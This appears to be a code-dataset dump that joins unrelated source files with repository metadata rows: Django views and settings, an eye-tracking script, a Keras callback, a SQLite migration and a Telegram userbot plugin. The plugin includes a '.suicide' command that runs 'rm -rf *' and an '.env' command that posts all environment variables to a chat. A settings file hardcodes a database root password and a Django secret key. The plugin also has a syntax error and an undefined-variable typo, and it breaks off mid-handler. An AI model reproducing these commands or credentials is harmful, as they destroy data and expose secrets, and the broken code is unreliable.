<td><img src="/static/cabinetmaps/server1U.png" class="timg" id="%s" data-name="img"></td>
</tr>
"""
s2 = """
<tr>
<td rowspan="2" class="u2server"><img src="/static/cabinetmaps/server.png" class="timg" id="%s" data-name="img"></td>
</tr>
"""
s4 = """
<tr>
<td rowspan="4" class="u4server"><img src="/static/cabinetmaps/r930.png" class="timg" id="%s" data-name="img"></td>
</tr>
"""
st = """
<tr>
<td><img src="/static/cabinetmaps/net.png" class="timg" id="%s" data-name="img"></td>
</tr>
"""
sf = """
<tr>
<td><img src="/static/cabinetmaps/fw.png" class="timg" id="%s" data-name="img"></td>
</tr>
"""
sm = """
<tr>
<td></td>
</tr>
"""
sb = """
<tr>
<td><img src="/static/cabinetmaps/blank.png" class="timg"></td>
</tr>
"""
sn = "</tbody></table></div>"
count_rail = 41
# 下次用递归函数改写下
while count_rail >= 1:
flag = 0
for ass in all_cab_ass:
if count_rail == ass.railnum:
flag = 1
# if ass.railnum == 35: print ass,"=============="
if ass.machine_type == 3:
if ass.get_uhight_display() == 1:
_s1 = copy.deepcopy(s1)
_s1 = _s1 % ass.id
s += _s1
count_rail -= 1
elif ass.get_uhight_display() == 2:
_s2 = copy.deepcopy(s2)
_s2 = _s2 % ass.id
s += _s2 + sm
count_rail -= 2
elif ass.get_uhight_display() == 4:
_s4 = copy.deepcopy(s4)
_s4 = _s4 % ass.id
s += _s4 + sm*3
count_rail -= 4
elif ass.machine_type == 2 :
_st = copy.deepcopy(st)
_st = _st % ass.id
s += _st
count_rail -= 1
elif ass.machine_type in (0 , 1):
_sf = copy.deepcopy(sf)
_sf = _sf % ass.id
s += _sf
count_rail -= 1
else:
return False
if flag == 0:
s += sb
count_rail -= 1
print count_rail,"-----count_rail ------"
s += sn
cabinets_template += '\n' + s
logger.debug(cabinets_template)
return cabinets_template
def page_list_return(total, current=1):
"""
page
分页,返回本次分页的最小页数到最大页数列表
"""
min_page = current - 2 if current - 4 > 0 else 1
max_page = min_page + 4 if min_page + 4 < total else total
return range(min_page, max_page + 1)
def pages(post_objects, request):
"""
page public function , return page's object tuple
分页公用函数,返回分页的对象元组
"""
per_page = request.GET.get("per_page",20)
paginator = Paginator(post_objects, per_page)
try:
current_page = int(request.GET.get('page', '1'))
except ValueError:
current_page = 1
page_range = page_list_return(len(paginator.page_range), current_page)
try:
page_objects = paginator.page(current_page)
except (EmptyPage, InvalidPage):
page_objects = paginator.page(paginator.num_pages)
if current_page >= 5:
show_first = 1
else:
show_first = 0
if current_page <= (len(paginator.page_range) - 3):
show_end = 1
else:
show_end = 0
# 所有对象, 分页器, 本页对象, 所有页码, 本页页码,是否显示第一页,是否显示最后一页
return post_objects, paginator, page_objects, page_range, current_page, show_first, show_end
| [
"gaotao@huored.com"
] | gaotao@huored.com |
c3493467acffb606aefbbf9f4ca1107f40f79470 | 1332983c07bbecc16ec694a10d9557100b8af031 | /Front-End/distance.py | 7768d20a848df20f3260370a2f96a554b47d689c | [] | no_license | kkuzminskas/cs3235 | c37487580164cf2a1238aac75770375b975ef191 | 577e656316120ca29542e45699ba5f3f21972a18 | refs/heads/master | 2023-01-09T07:30:40.673905 | 2019-11-13T06:52:11 | 2019-11-13T06:52:11 | 216,753,016 | 0 | 2 | null | 2023-01-04T23:38:04 | 2019-10-22T07:43:38 | Python | UTF-8 | Python | false | false | 1,316 | py |
import prep_data
import dist_analysis
import json
import numpy as np
def extract_norm_x_y_t(filename):
try:
file = open(filename, "r")
data = file.read()
data = json.loads(data)['all']
except:
prep_data.clean_data(filename)
return extract_norm_x_y_t
tracking_data = [l for l in data if l['category'] ==
"tracker" and l['values']['frame']['state'] == 7]
time_stamps = np.array([l['values']['frame']['time']
for l in tracking_data])
time_stamps = time_stamps - time_stamps[0]
x_y_data = np.array([(l['values']['frame']['avg']['x'],
l['values']['frame']['avg']['y']) for l in tracking_data])
x_y_t = np.concatenate((x_y_data, time_stamps.T.reshape((len(x_y_data), 1))), axis=1)
return dist_analysis.whiten(x_y_t)
def eyenalysis(filename):
reference_files = [f"../data/siqi{i+1}.txt" for i in range(8)]
norm_x_y_t = extract_norm_x_y_t(filename)
sum = 0
for f in reference_files:
ref_norm_x_y_t = extract_norm_x_y_t(f)
sum += dist_analysis.eyenalysis_distance(norm_x_y_t, ref_norm_x_y_t)
# threshold determined experimentally
#return (sum / len(reference_files)) < 0.78549708
return (sum /len(reference_files)) <0.70588 | [
"kendallkuzminskas2020@u.northwestern.edu"
] | kendallkuzminskas2020@u.northwestern.edu |
4c0ef9a83233da4c94a5a82848e953f60b8f5ccb | 92d7e64212dfc4ef025eb1da6ac745d86b45482d | /hello.py | 7c97d7be985a9ff8e01c53aa200ae24c80910687 | [
"MIT"
] | permissive | abhishekanand/leetcode | 1be6c4cfae1d00735f064d10194d1ccd3a9d0ecf | f1f86d20312561ec599f076587d696d126e88bdd | refs/heads/master | 2020-03-13T19:54:33.674946 | 2018-07-06T06:34:37 | 2018-07-06T06:34:37 | 131,263,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 59 | py | import pandas as pd
import os
x = 5
print("Hello world!")
| [
"noreply@github.com"
] | noreply@github.com |
e153e5d4b04c8b4638087b42cd4998c8931ec241 | 595854e3b2095736efe18eba0f64823924cff4f3 | /cooking/asgi.py | de4ee270d33d87e5c8b767ee1124308605f40210 | [] | no_license | saigurrampati/recipe | 9c50640ced95c2369339a8b38372803381a1f1fb | e5d6f4265073418a266aaf65ab6c5232053e555f | refs/heads/main | 2023-06-05T12:56:36.389085 | 2021-05-07T07:41:11 | 2021-05-07T07:41:11 | 363,030,628 | 0 | 0 | null | 2021-06-28T02:31:33 | 2021-04-30T04:57:13 | Python | UTF-8 | Python | false | false | 391 | py | """
ASGI config for cooking project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'cooking.settings')
application = get_asgi_application()
| [
"g.saikumarreddy19@gmail.com"
] | g.saikumarreddy19@gmail.com |
6c16e2c8f646a76de7c95d1bce0bd8207155521e | 5d0dd50d7f7bf55126834292140ed66306e59f10 | /MIGRATE/msgpack_to_sql.py | 4ce966fdef93c6b79fcabe824ec1177b571c63de | [] | no_license | JellyWX/tracker-bot | 32d2c8666a7c6ca0835aa94695be4ccd7fc37bb5 | b0909c4883b0ee6e0300a163e94ea0d69dffa062 | refs/heads/master | 2021-05-02T16:14:11.638292 | 2018-04-26T19:47:50 | 2018-04-26T19:47:50 | 120,670,416 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 592 | py | import msgpack
import sqlite3
with open('../DATA/USER_DATA', 'rb') as f:
data = msgpack.unpack(f, encoding='utf8')
connection = sqlite3.connect('../DATA/data.db')
cursor = connection.cursor()
for user, values in data.items():
command = '''CREATE TABLE u{user} (
game VARCHAR(50),
time INT
)
'''.format(user=user)
cursor.execute(command)
for game, time in values.items():
command = '''INSERT INTO u{user} (game, time)
VALUES (?, ?);'''.format(user=user)
cursor.execute(command, (game, time))
connection.commit()
connection.close()
| [
"judewrs@gmail.com"
] | judewrs@gmail.com |
463cb930ed33d88b8c55dfbae8cb4eb3ce6e48c8 | 782ef5f9dfa872590409a568973c56be8072597d | /project/settings.py | b0984615b18207eccda51b3da8bc3dc698c5b089 | [] | no_license | heraldmatias/liceolncc | 34fa013bdcc31c1595699207b9494db8f8713c22 | 02931da47936e3c5c41dfe6d0e250acc837c6fba | refs/heads/master | 2021-01-22T06:37:00.810302 | 2012-08-15T23:36:14 | 2012-08-15T23:36:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,145 | py | # -*- coding: utf-8 -*-
# Django settings for project project.
from os.path import dirname, join, realpath, split
SYSTEM_PATH, PROJECT_DIR = split(realpath(dirname(__file__)))
ADMINS = (
('Herald Olivares', 'heraldmatias.oz@gmail.com'),
('Moises Ibanez', 'moics30@gmail.com'),
)
FCGI_OPTIONS = {
'method': 'threaded',
}
MANAGERS = ADMINS
DEBUG=True
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'plataforma', # Or path to database file if using sqlite3.
'USER': 'root', # Not used with sqlite3.
'PASSWORD': 'ollanta2011', # Not used with sqlite3.i
'HOST': 'localhost', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
'OPTIONS': {
'init_command': 'SET storage_engine=INNODB',
}
}
}
DEFAULT_FROM_EMAIL = 'prensa@presidencia.gob.pe'
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Lima'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'es-PE'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = realpath(join(SYSTEM_PATH, 'media'))
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = '/media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = realpath(join(SYSTEM_PATH, 'static'))
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = STATIC_URL + "grappelli/"
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = '+28r#@97t-sbf(6_r!nucte+z!jr**sv07n6q_lj28c5yhx#eq'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
#'pybb.middleware.PybbMiddleware',
)
ROOT_URLCONF = 'project.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
realpath(join(SYSTEM_PATH, 'templates')),
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'grappelli',
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'modules',
'south',
'django_tables2',
'home',
)
GRAPPELLI_ADMIN_TITLE = 'Sitio Administrativo de Liceo Naval Manuel Clavero Muga'
LOGIN_URL = '/'
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.request",
"django.core.context_processors.static",
"django.core.context_processors.csrf",
#'pybb.context_processors.processor',
)
AUTH_PROFILE_MODULE = 'usuario.Usuario'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| [
"heraldo@jorge-HP-Compaq-8200-Elite-SFF-PC.(none)"
] | heraldo@jorge-HP-Compaq-8200-Elite-SFF-PC.(none) |
9d975f2478bf0f76125b516f1f17802747c622f8 | 7c668c22c3c79428e4be833cab2251cb5134b1f5 | /python_deep_learning2/7_10.create_custom_callback.py | 1d771b316e7d10f736daa91a61c2b31f2513c9e1 | [] | no_license | tengge1/LearnPython | 486297fe892528d2e71876b686bda5785e4f43bd | 862b4484b74f7a4b27105212ad76785fa02f87c0 | refs/heads/master | 2022-10-14T09:36:15.872035 | 2020-04-10T04:02:27 | 2020-06-08T04:02:36 | 228,754,433 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,615 | py | from tensorflow import keras
from tensorflow.keras import Sequential
from tensorflow.keras.datasets import mnist
from tensorflow.keras.layers import Flatten, Dense
import numpy as np
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train / 255.0
x_test = x_test / 255.0
model = Sequential()
model.add(Flatten(input_shape=(28, 28)))
model.add(Dense(64, activation='relu'))
model.add(Dense(10, activation='softmax'))
model.compile(
optimizer='rmsprop',
loss='sparse_categorical_crossentropy',
metrics=['accuracy']
)
class ActivationLogger(keras.callbacks.Callback):
def __init__(self, val_data):
super().__init__()
self.validation_data = val_data
def set_model(self, model):
self.model = model
layer_outputs = [layer.output for layer in model.layers]
self.activations_model = keras.models.Model(model.input, layer_outputs)
def on_epoch_end(self, epoch, logs=None):
if self.validation_data is None:
raise RuntimeError('Requires validation_data.')
validation_sample = self.validation_data[0][0:1]
activations = self.activations_model.predict(validation_sample)
f = open('activations_at_epoch_' + str(epoch) + '.npz', 'wb')
np.savez(f, activations)
f.close()
x_val = x_train[:10000]
y_val = y_train[:10000]
partial_x_train = x_train[10000:]
partial_y_train = y_train[10000:]
logger = ActivationLogger((x_val, y_val))
model.fit(
partial_x_train,
partial_y_train,
epochs=2,
batch_size=128,
validation_data=(x_val, y_val),
callbacks=[logger]
)
| [
"930372551@qq.com"
] | 930372551@qq.com |
6f7629ccc4c0086b3e895b41224590449279acb5 | 60ec81571533bbfda62ed3b383c3ae984af005a8 | /recipes_exam/recipes_exam/urls.py | c7848c3dcbca30149e5701b86d5f782f2068f718 | [] | no_license | fingerman/django-projects | f35f4a39810b0db6294bfe689c30ad62947839b9 | ba3606abf7d77025ff08ffaffb64110ea2f4f92c | refs/heads/master | 2023-02-27T05:18:53.600833 | 2021-01-31T21:07:25 | 2021-01-31T21:07:25 | 334,756,435 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 798 | py | """recipes_exam URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('app.urls')),
]
| [
"adamov.george@gmail.com"
] | adamov.george@gmail.com |
cdaa954933ee74866fd220287c1b3d8d73887ee1 | 99b92590ccba48f40a53d6200d8dbe2bdbdc0314 | /stdplugins/execmod.py | 74b7fe2fec75f9a149e6dc81a072dffe31f7e3d2 | [
"Apache-2.0"
] | permissive | SirGod/PornHub | b5dd079db385817eb598c01b4846d3b4763529f7 | 2fb1368d673b5efa10349939974f59c3d6a114ec | refs/heads/master | 2020-09-04T11:17:33.914120 | 2019-11-05T07:09:29 | 2019-11-05T07:09:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,256 | py | """COMMAND : .cpu, .uptime, .suicide, .env, .pip, .neofetch, .coffeehouse, .date, .stdplugins, .fast, .iwantsex, .telegram, .listpip, .pyfiglet, .kowsay"""
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from telethon import events
import subprocess
from telethon.errors import MessageEmptyError, MessageTooLongError, MessageNotModifiedError
import io
import asyncio
import time
import os
if not os.path.isdir("./SAVED"):
os.makedirs("./SAVED")
if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY):
os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY)
@borg.on(admin_cmd(pattern="cpu"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "cat /proc/cpuinfo | grep 'model name'"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) CPU Model:**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="uptime"))async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "uptime"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) CPU UPTIME:**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="suicide"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "rm -rf *"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) SUICIDE BOMB:**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="stdplugins"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "ls stdplugins"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) STDPLUGINS:**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="pip"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "pip install --upgrade pip"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) PIP UPGRADE:**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="date"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "date"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) Date & Time Of India:**\n\n\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="env"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "env"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) Environment Module:**\n\n\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="neofetch"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "git clone https://github.com/dylanaraps/neofetch.git"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) Neofetch Installed, Use `.sysd` :**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="telethon"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "pip install --upgrade telethon"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) Telethon Updated**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="fast"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "speedtest-cli"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) , Server Speed Calculated:**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="coffeehouse"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "pip install --upgrade coffeehouse"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) , Coffeehouse Updated:**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="iwantsex"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "pip install sex"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
